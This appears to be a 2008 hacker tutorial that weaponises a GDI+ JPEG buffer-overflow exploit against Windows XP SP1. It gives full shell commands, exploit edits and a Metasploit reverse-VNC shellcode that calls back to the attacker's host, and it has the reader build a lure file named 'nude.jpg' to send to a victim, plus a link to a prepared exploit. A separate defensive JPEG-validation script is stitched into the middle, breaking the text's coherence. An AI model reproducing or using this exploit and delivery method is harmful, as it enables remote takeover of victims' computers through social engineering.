IntroToBufferOverflows.txt
Posted Apr 1, 2008
Authored by IMC Tullywacker | Site Insanemasterminds.com

Intro to Buffer Overflows - A whitepaper demonstrating a buffer overflow on a Windows XP SP1 box using Backtrack 3 Beta.

tags | paper, overflow
systems | windows
SHA-256 | 7eee601d3a61af58f41eee3b233daabac27cbb59bda1011826f01dafdda38592
Intro to Buffer Overflows 
By IMC Tullywacker

Shouts
IMC GrahamPhisher
IMC EXE
IMC TwiZted
IMC PhirePhreak

Insanemasterminds.com
GrahamPhisher.com
remote-exploit.org


Hello, today I am going to show you how to perform a buffer overflow on a Windows XP SP1 box. I
am going to be using Backtrack 3 Beta, and you should too so you can follow along easily.

If you are unfamiliar with buffer overflows I suggest you read up on them before proceeding to the tutorial.
http://en.wikipedia.org/wiki/Buffer_overflow

Ok, let's begin: fire up Backtrack.

Open up a new terminal.

Code:

cd /pentest/exploits/milw0rm


Ok, now let's search the sploit list for GDI exploits:

Code:

grep -i GDI sploitlist.txt


Ok, now copy the 475.sh sploit to the /tmp/ directory:

Code:

cp ./platforms/windows/remote/475.sh /tmp/


Now let's edit the file to better suit our needs:

Code:

nano /tmp/475.sh


We need to set the shellcode address for Windows XP SP1 English, so comment out the 1st printf line and
uncomment the 2nd, like so:

Code:

#********************************************
#Address of shellcode
#********************************************
#printf "\x42\x42\x42\x42" #control EDX, left these values if u wanna raise an exception and debug in GDI+
printf "\xDC\xB1\xE7\x70" #70E7B1DC WinXP Professional English SP1 -GDIPLUS.DLL version 5.1.3097.0
#printf "\xDC\xB1\x30\x78" #7830B1DC WinXP Professional Italian SP1 -GDIPLUS.DLL version 5.1.3101.0


Next, there are formatting problems in the image junk section that need to be corrected:

Code:

#********************************************
#Image junk here...fake JPG
#********************************************
printf "\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07";
printf "\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14";
printf "\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C";
printf "\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C";
printf "\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D";
printf "\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22";
printf "\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01";
printf "\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05";
printf "\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02";
printf "\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05";
printf "\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08";
printf "\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17";
printf "\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43";
printf "\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64";
printf "\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85";
printf "\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4";
printf "\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3";
printf "\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1";
printf "\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8";
printf "\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01";
printf "\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A";
printf "\x0B\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04";
printf "\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41";
printf "\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1\x09\x23";
printf "\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1\x17\x18\x19";
printf "\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47";
printf "\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68";
printf "\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88";
printf "\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7";
printf "\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6";
printf "\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5";
printf "\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00";
printf "\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF9\xFE\x8A\x28\xA0\x0F";


Now let's edit the shellcode area: we need to replace \xCC with a NOP (\x90) and fix another formatting issue.

Code:

#********************************************
#SHELLCODE AREA
#place shellcode here...
#don't use any "FFD9" bytes, cause it is the marker for end of jpeg image
#********************************************
printf "\x90\x90\x90\x90"; #replace "CC=INT3" byte with NOP to make it work!


Ok, next fix yet another formatting issue:

Code:

#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for your Framework, is great!)
#********************************************


Now, the original purpose of this exploit is to add an administrator to the users group, as you can see from the line
above. We are going to be using a reverse VNC connection instead, because a nice GUI is always the most fun.

You can do that if you want, just to see that the sploit works, but here at IMC we strive to do shit differently.

Now cd into the framework2 directory:

Code:

cd /pentest/exploits/framework2


To view all the payloads, type:

Code:

./msfpayload


We're going to use the win32_reverse_vncinject payload.

Now, to see what variables need to be set, we type:

Code:

./msfpayload win32_reverse_vncinject


As you can see, the only field left blank is the LHOST option, so we need our LAN IP address:

Code:

ifconfig


Code:

inet addr:192.168.1.113


Now we need to generate our custom payload and put it into our sploit:

Code:

./msfpayload win32_reverse_vncinject LHOST=192.168.1.113 P


This will return the payload suited to our needs.

Here's mine:

Code:

"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c".
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32".
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07".
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24".
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8".
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64".
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e".
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53".
"\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4".
"\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57".
"\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89".
"\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59".
"\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50".
"\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\xc0\xa8\x01".
"\x71\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59".
"\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10\x00\x00".
"\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";


So copy your payload, and now let's put it in our sploit:

Code:

nano /tmp/475.sh


Code:

#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for your Framework, is great!)
#********************************************
printf "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c".
printf "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32".
printf "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07".
printf "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24".
printf "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8".
printf "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64".
printf "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e".
printf "\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53".
printf "\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4".
printf "\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57".
printf "\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89".
printf "\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59".
printf "\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50".
printf "\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\xc0\xa8\x01".
printf "\x71\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59".
printf "\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10\x00\x00".
printf "\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";


Now we need to set up our payload handler:

Code:

./msfcli payload_handler PAYLOAD=win32_reverse_vncinject LHOST=192.168.1.102


Now you need to turn your sploit into a .jpg file:

Code:

cd /tmp/


Code:

chmod +x 475.sh


Code:

./475.sh > nude.jpg


Now what you're going to do is give the victim the file: email, share, whatever, up to you.

All you have to do now is sit and wait for the victim to open a folder containing the malicious .jpg file; they
don't even have to open the image itself! This will spawn a VNC session and give you a GUI of the computer.
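On the defending side, a file-share or mail-gateway scanner can quarantine a JPEG before any image library touches it by walking its marker segments and checking that every declared segment length is sane and that nothing follows the FFD9 end-of-image marker the paper mentions. The Python below is an added example, not code from this paper or from the 475.sh exploit; the three sample files at the bottom are constructed for the example.

```python
STANDALONE = {0xD8, 0xD9, 0x01} | set(range(0xD0, 0xD8))  # SOI, EOI, TEM, RST0-7: no length field

def _at_marker(data, pos):  # a real marker, not a stuffed FF00 or an RSTn inside scan data
    return data[pos] == 0xFF and data[pos + 1] != 0x00 and data[pos + 1] not in range(0xD0, 0xD8)

def walk_jpeg(data):
    """Walk the marker segments; return (segments, findings): (marker, declared length) pairs and anomaly strings."""
    segments, findings = [], []
    if data[:2] != b"\xFF\xD8":
        return segments, ["no SOI (FFD8) at offset 0"]
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return segments, findings + [f"expected a marker at offset {pos}, got {data[pos]:#04x}"]
        marker = data[pos + 1]
        if marker in STANDALONE:
            segments.append((marker, 0))
            pos += 2
            if marker == 0xD9:  # EOI: a well-formed file ends here, so anything after it is suspect
                if pos != len(data):
                    findings.append(f"{len(data) - pos} trailing bytes after EOI (FFD9)")
                return segments, findings
            continue
        # The 16-bit length counts its own two bytes, so a valid segment never declares < 2.
        length = int.from_bytes(data[pos + 2:pos + 4], "big") if pos + 4 <= len(data) else -1
        segments.append((marker, length))
        if length < 2:
            findings.append(f"marker {marker:#04x} at offset {pos}: length field missing or < 2 ({length})")
            return segments, findings
        if pos + 2 + length > len(data):
            findings.append(f"marker {marker:#04x} at offset {pos}: segment runs past end of file")
            return segments, findings
        pos += 2 + length
        if marker == 0xDA:  # SOS: skip entropy-coded data until the next real marker
            while pos + 1 < len(data) and not _at_marker(data, pos):
                pos += 1
    findings.append("no EOI (FFD9) marker found")
    return segments, findings

# Constructed samples (not from the paper): a tiny well-formed file, one whose COM segment declares an impossible length, and one with bytes appended after EOI.
_HDR = b"\xFF\xD8\xFF\xE0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
_SOS = b"\xFF\xDA\x00\x08\x01\x01\x00\x00\x3F\x00" + b"\x12\x34\xFF\x00\x56"
GOOD_JPEG = _HDR + b"\xFF\xFE\x00\x05abc" + _SOS + b"\xFF\xD9"
BAD_LENGTH_JPEG = _HDR + b"\xFF\xFE\x00\x01abc" + _SOS + b"\xFF\xD9"
TRAILING_JPEG = GOOD_JPEG + b"\x90\x90\x90\x90"

if __name__ == "__main__":
    for name, blob in (("good", GOOD_JPEG), ("bad_length", BAD_LENGTH_JPEG), ("trailing", TRAILING_JPEG)):
        print(name, walk_jpeg(blob)[1] or "no anomalies")
```

A real scanner would run walk_jpeg over every image landing on a share and quarantine anything with a non-empty findings list rather than letting a viewer or thumbnailer parse it first.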

Congrats on making your 1st malicious .jpg file.

For all you lazy people, I've uploaded the modified sploit; all you have to do is change the payload:

Code:

http://imctully.hostaim.com/maliciousjpg.txt


~Tully